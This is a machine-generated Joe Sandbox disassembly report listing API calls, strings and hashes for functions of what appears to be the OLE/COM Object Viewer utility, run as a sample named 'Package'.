#6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30363
#3087.MFC42U(000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30374
#6211.MFC42U(000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3037B
#3087.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30388
#6211.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3038F
#3087.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D3039C
#6211.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D303A3
#3087.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D303B0
#6211.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D303B7
#3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D303C4
#6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D303CB
#3087.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41), ref: 00D303D8
#6211.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41), ref: 00D303DF
#3087.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00D303EC
#6211.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00D303F3
#3087.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00D30400
#6211.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00D30407
#3087.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00D30414
#6211.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00D3041B
#3087.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00D30431
#2634.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00D30438
#3087.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00D30445
#2634.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00D3044C
#3087.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00D30459
#2634.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00D30460
#3087.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00D3046D
#2634.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00D30474

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #3087$#6211$#2634
String ID:
API String ID: 3514023408-0
Opcode ID: 6f0e3403c5a9fdffc532d6e6f874f60796342d245e6ac2aad52af6158e0ddbce
Instruction ID: 3fac19a7701cf37455cefc1a8e8e95ac26784fa65ca93d0e901bf7b0241184ea
Opcode Fuzzy Hash: 6f0e3403c5a9fdffc532d6e6f874f60796342d245e6ac2aad52af6158e0ddbce
Instruction Fuzzy Hash: 60418C51F807A426FD1932791C6BF7E665ACBD9F45F00442872429F2D3DE6D8E0282BE

Function 00D2FCE0 Relevance: 49.1, APIs: 18, Strings: 10, Instructions: 108
windowlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4704.MFC42U ref: 00D2FCED
SendMessageW.USER32(?,00000143,00000000,None), ref: 00D2FD06
SendMessageW.USER32(?,00000143,00000000,Both), ref: 00D2FD19
SendMessageW.USER32(?,00000143,00000000,Free), ref: 00D2FD2C
SendMessageW.USER32(?,00000143,00000000,Apartment), ref: 00D2FD3F
SendMessageW.USER32(?,00000143,00000000,Neutral), ref: 00D2FD52
SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2FD84
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2FD9E
SendMessageW.USER32(?,0000133E,00000002,00000001), ref: 00D2FDB8
#3087.MFC42U(0000008B,00000000), ref: 00D2FDC6
#2634.MFC42U(0000008B,00000000), ref: 00D2FDCD
#3087.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00D2FDDA
#2634.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00D2FDE1
#3087.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDEE
#2634.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDF5
LoadLibraryW.KERNEL32(OLE32.DLL,000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDFF
GetProcAddress.KERNEL32(00000000,CoRegisterSurrogate), ref: 00D2FE11
FreeLibrary.KERNEL32(00000000), ref: 00D2FE26

Strings

CoRegisterSurrogate, xrefs: 00D2FE0B
Neutral, xrefs: 00D2FD45
None, xrefs: 00D2FCF2
Free, xrefs: 00D2FD1F
Local Server, xrefs: 00D2FD8D
Apartment, xrefs: 00D2FD32
Inproc Handler, xrefs: 00D2FDA7
Both, xrefs: 00D2FD0C
OLE32.DLL, xrefs: 00D2FDFA
Inproc Server, xrefs: 00D2FD7D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2634#3087$Library$#4704AddressFreeLoadProc
String ID: Apartment$Both$CoRegisterSurrogate$Free$Inproc Handler$Inproc Server$Local Server$Neutral$None$OLE32.DLL
API String ID: 2746026577-3659237039
Opcode ID: 5eb1c754aac4edcdd8bcbb566fcd2f12eba2217b62bc1f0d3b2515a634574290
Instruction ID: 4e6ccd1f167a45c96f456242692bf4a9d17c2e750d55fad173a3bdbee8b2501f
Opcode Fuzzy Hash: 5eb1c754aac4edcdd8bcbb566fcd2f12eba2217b62bc1f0d3b2515a634574290
Instruction Fuzzy Hash: 73317531A007206BDF206F65DC4EF9B7E79EF93714F010034B915992A1CBB585468BB0

Function 00D2EAE6 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D2EAED
#338.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EAF7
#540.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EB0B
#860.MFC42U(00D2349E,0000000C,00D2EAD7,00000004), ref: 00D2EB27
#540.MFC42U ref: 00D2EB36
#540.MFC42U ref: 00D2EB42
#4155.MFC42U(00000004), ref: 00D2EB50
#4155.MFC42U(00000008,00000004), ref: 00D2EB5A
#3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00D2EB6E
#861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB7E
#3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB8D
#861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB9D
#3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBAC
#800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBB7
#800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBBF

Strings

ViewHiddenComCats, xrefs: 00D2EB73
ExpertMode, xrefs: 00D2EB92

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #3516#540$#4155#800#861$#338#860H_prolog3
String ID: ExpertMode$ViewHiddenComCats
API String ID: 3415677798-816868219
Opcode ID: 90bfab63ae1bdb68f8eac94fbb958954790594b2a8d1e22ed145f5fbe1e99b5b
Instruction ID: d24ee639c4ae97fbe77972792bc11e38f27d9f0f2b12e17193af371209624c3c
Opcode Fuzzy Hash: 90bfab63ae1bdb68f8eac94fbb958954790594b2a8d1e22ed145f5fbe1e99b5b
Instruction Fuzzy Hash: 17213D75A4071A9BDF15EBA0C856BAEBB72EF64704F500818F5413B2D2DBB45A08CB71

Function 00D37FF0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 290
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D39205: SendMessageW.USER32(?,00001109,00D3803D,00000000), ref: 00D39220
Part of subcall function 00D39205: #2857.MFC42U(00000000,?,00D3803D,00000000,23685920), ref: 00D39227

#1662.MFC42U(00000000,23685920), ref: 00D3807F

Part of subcall function 00D2E18B: SendMessageW.USER32(?,0000000B,?,00000000), ref: 00D2E19A

CoCreateInstance.OLE32(00D236E4,00000000,00000001,00D236F4,00000000,00000000,23685920), ref: 00D380AB

Part of subcall function 00D37F0B: SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D

#2644.MFC42U(00000000), ref: 00D38436

Strings

Interfaces, xrefs: 00D383CC
OLE Embeddable Objects, xrefs: 00D38222
COM Library Objects, xrefs: 00D382DA
OLE Controls, xrefs: 00D38250
Object Classes, xrefs: 00D38144
Unclassified Objects, xrefs: 00D3827E
Type Libraries, xrefs: 00D3839E
Application IDs, xrefs: 00D38369
g, xrefs: 00D38103
All Objects, xrefs: 00D3830B
OLE 1.0 Objects, xrefs: 00D382AC
Grouped by Component Category, xrefs: 00D3817B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#2857CreateInstance
String ID: All Objects$Application IDs$COM Library Objects$Grouped by Component Category$Interfaces$OLE 1.0 Objects$OLE Controls$OLE Embeddable Objects$Object Classes$Type Libraries$Unclassified Objects$g
API String ID: 2376137332-450955224
Opcode ID: 902d97033306d96569308cfde1b02ceffe69930922858f85ce5e5800fc051093
Instruction ID: 1a5b6980e20799fcfe6806b96381766b23cd806418ef0a8d2448aa40062d33cf
Opcode Fuzzy Hash: 902d97033306d96569308cfde1b02ceffe69930922858f85ce5e5800fc051093
Instruction Fuzzy Hash: 12E1CDB0E106199FDB54EFE4D899BAEBBB1FF44308F100528E011AB3A5DBB59845CF20

Function 00D2F090 Relevance: 25.6, APIs: 17, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#3867.MFC42U(?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F09C
#3087.MFC42U(000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0B2
#2634.MFC42U(000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0B9
#3087.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0C6
#2634.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0CD
#3087.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0DA
#2634.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0E1
#3087.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00D2F0EE
#2634.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00D2F0F5
#3087.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000), ref: 00D2F102
#2634.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000), ref: 00D2F109
#3087.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001), ref: 00D2F116
#2634.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001), ref: 00D2F11D
#3087.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00D2F12A
#2634.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00D2F131
#3087.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00D2F13E
#2634.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00D2F145

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634#3087$#3867
String ID:
API String ID: 580456896-0
Opcode ID: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
Instruction ID: 36cf5bcfd09e6b42dd87f2c2fd828da1e3eb9c5890982298edb1b74923e263f1
Opcode Fuzzy Hash: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
Instruction Fuzzy Hash: BA01FF22F5137422DE3A36751C6BABE6A57CFD1B90F044418B1065F2D6DE794D02C2B9

Function 00D2DA30 Relevance: 22.6, APIs: 15, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4714.MFC42U ref: 00D2DA47
#2078.MFC42U(00000085,?), ref: 00D2DA60
#2078.MFC42U(00000087,?,00000085,?), ref: 00D2DA71
#2078.MFC42U(00000088,?,00000087,?,00000085,?), ref: 00D2DA84
#2078.MFC42U(0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00D2DA97
#2078.MFC42U(0000008E,?,0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00D2DAAA
GetWindowRect.USER32(?,?), ref: 00D2DABE
GetWindowRect.USER32(?,?), ref: 00D2DAD0

Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC

#6193.MFC42U(00000000,000000FF,?,?,?,0000001C,?), ref: 00D2DB03
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?,?,0000001C,?), ref: 00D2DB1B
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?), ref: 00D2DB34
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB48
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB5C
#6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB70
#6127.MFC42U(00000001,00000001,00000001,6CBF0790,6CBF0790,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8), ref: 00D2DB84

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6193$#2078$ClientRectScreenWindow$#3133#4714#6127
String ID:
API String ID: 1113752235-0
Opcode ID: 2716cb6146a59ee4fcced2e692245254e1b6d627975cce6a5bae301580869f48
Instruction ID: 1af59285f0a44940574a9402d6fb0d50ed24828f04b02a925da62dbff079dd97
Opcode Fuzzy Hash: 2716cb6146a59ee4fcced2e692245254e1b6d627975cce6a5bae301580869f48
Instruction Fuzzy Hash: B44141317402087BEB24DF55DC9AFEF3B69EB85B54F444078B609AE1C2DAA1AD05C770

Function 00D3BD2A Relevance: 17.5, APIs: 4, Strings: 6, Instructions: 25
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3

LoadLibraryW.KERNELBASE(ACLUI.DLL,00D2B51D), ref: 00D3BD38
MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00D3BD50
exit.MSVCRT ref: 00D3BD58
GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00D3BD64

Strings

ACLUI.DLL, xrefs: 00D3BD33
Couldn't load ACLUI.DLL!, xrefs: 00D3BD49
OLEViewer, xrefs: 00D3BD74
OleViewer, xrefs: 00D3BD44
EditSecurity, xrefs: 00D3BD5E
Couldn't get address of EditSecurity ACLUI.DLL!, xrefs: 00D3BD79

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: AddressLibraryLoadMessageProcVersionexit
String ID: ACLUI.DLL$Couldn't get address of EditSecurity ACLUI.DLL!$Couldn't load ACLUI.DLL!$EditSecurity$OLEViewer$OleViewer
API String ID: 2950567464-1848169023
Opcode ID: d5bed083bae3a7f498afa30374348a925ce00fd729fb2eff4ed236aabe643341
Instruction ID: 6621c2b49a664c93a8452231213943b5f4a3015c6fd7139b3cfafc935a8ac42d
Opcode Fuzzy Hash: d5bed083bae3a7f498afa30374348a925ce00fd729fb2eff4ed236aabe643341
Instruction Fuzzy Hash: FCE01A34385795BFE7202FA07E0BF293995AB29B1BF080012B746E41E4DBB1D0585639

Function 6E2F5A1D Relevance: 16.7, APIs: 11, Instructions: 188
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E2F5602: HeapFree.KERNEL32(00000000,00000000,?,6E2F4C74), ref: 6E2F5618
Part of subcall function 6E2F5602: GetLastError.KERNEL32(?,?,6E2F4C74), ref: 6E2F5623

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B4E
GetExitCodeProcess.KERNELBASE(?,?), ref: 6E2F5B5B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B70
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B7B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B86
__dosmaperr.LIBCMT ref: 6E2F5B8D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B98
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BA3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BB5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BC0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BF1

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
String ID:
API String ID: 2764183375-0
Opcode ID: 12ad8ae8b7a9c3fd29a32809b2e7e712e1cb1a431fd1e91672070c8d34303330
Instruction ID: e230bdc4e5c8bd3d60342c5b54153207339588aaf7128da9915a6197edd21242
Opcode Fuzzy Hash: 12ad8ae8b7a9c3fd29a32809b2e7e712e1cb1a431fd1e91672070c8d34303330
Instruction Fuzzy Hash: 8E518B758C020EEFDF019FD0C899EEEFBBBAF4531AF108455E812A6140DB318E52DA65

Function 00D30D90 Relevance: 15.1, APIs: 10, Instructions: 74COMMON

Download Yara Rule

APIs

#5491.MFC42U ref: 00D30DA3
#4451.MFC42U(?), ref: 00D30DAD
#2112.MFC42U(?,50002800,0000E800,?), ref: 00D30DCE
#4158.MFC42U(00000002,?,50002800,0000E800,?), ref: 00D30DDF
#5867.MFC42U(?,00000002,?,50002800,0000E800,?), ref: 00D30DF4
#2109.MFC42U(?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E0C
#5996.MFC42U(00D439A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E1E
#3477.MFC42U(00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E37
#6063.MFC42U(00000000,00000000,?,?,00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002), ref: 00D30E4E
#2550.MFC42U(00000001,00000000,00000000,?,?,00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002), ref: 00D30E57

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2109#2112#2550#3477#4158#4451#5491#5867#5996#6063
String ID:
API String ID: 1972827604-0
Opcode ID: e2d393b4d66a16cb7c0b0a16f9508f4134ca6e472ce5013895e4c880f0395535
Instruction ID: 2bba8792dc12058a91bf1e98eb9afa939916303690b14a0aa85b18c8762cc6bd
Opcode Fuzzy Hash: e2d393b4d66a16cb7c0b0a16f9508f4134ca6e472ce5013895e4c880f0395535
Instruction Fuzzy Hash: F211E23531021876EE1662608C56FAFB79EDFC4710F180A24B917F62C2DFA0AA0486B4

Function 00D30CC0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D30CCD
SendMessageW.USER32(?,00001061,00000000,?), ref: 00D30CF8
SendMessageW.USER32(?,00001061,00000001,?), ref: 00D30D1C
#2634.MFC42U(00000000), ref: 00D30D2A
#2634.MFC42U(00000000,00000000), ref: 00D30D37

Strings

Can Launch, xrefs: 00D30D0E
User/Group, xrefs: 00D30CE3
j, xrefs: 00D30D15

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634MessageSend$#4704
String ID: Can Launch$User/Group$j
API String ID: 3599582684-3481516568
Opcode ID: a66d01e9bbeb7b05a7fe51e61bb0f13bec30b74fa0938c12910d2ab232b65f9b
